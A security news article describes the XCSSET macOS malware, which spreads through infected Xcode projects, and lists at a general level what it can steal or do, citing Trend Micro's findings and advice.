There was a time when Macs were considered safe from malware and other ills. Attackers preferred to go after Windows users simply because there were more of them – attackers could get more bang for their buck. That’s been changing, however, with more people owning Macs. This has led to a third zero-day attack on macOS in less than a year, allowing attackers to take advantage in several ways through Safari.
Discovery of Third macOS Zero-Day Attack
Last August, security experts found XCSSET, a zero-day attack that affected Mac developers. It gave them access to browser cookies and files. It also left behind website backdoors and made off with information from applications while leaving behind a ransom note. This past March, SentinelOne researchers discovered a library of Trojan code that installed the XCSSET malware on developer Macs.
A third instance of XCSSET has been discovered by Trend Micro researchers. In these two zero-day attacks on macOS, one takes advantage of a flaw to steal cookies, and the other takes advantage of a developer edition of Safari. The researchers found the attacks to be “quite unusual.”
“Malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects,” reads a blog post on the Trend Micro website. The researchers believe the attacks could be widespread, as the malware was also identified on VirusTotal sources.
The researchers detected the entry threat as “TrojanSpy.MacOS.XCSSET.A and its command and control (C&C) related files as Backdoor.MacOS.XCSSET.A.”
The Harm that XCSSET Causes
X code projects and modified apps are created from the malware and spread the attack. What isn’t known is how the malware reaches these Macs. What is known is that the X code projects have been modified to run malicious code, which reaches the Macs, leading user credentials and other information to be stolen.
Once it lands on a system, XCSSET can:
- Abuse Safari and other browsers
- Read and dump Safari cookies
- Inject backdoors on the Safari development version through a UXSS attack
- Steal information from apps
- Take screenshots
- Upload user files to the attacker’s server
- Encrypt files
- Show a ransom note
A UXSS attack affects browsing primarily. It can:
- Modify websites
- Modify/replace Bitcoin and cryptocurrency addresses
- Steal account credentials
- Steal Apple Store credit card information
- Block the user from changing passwords while stealing modified passwords
- Take screenshots
With three occurrences of the Mac zero-day attack in less than a year, there’s no telling where and when it will hit next. Trend Micro suggests users only download apps from official, legitimate sources and use a multilayer security solution.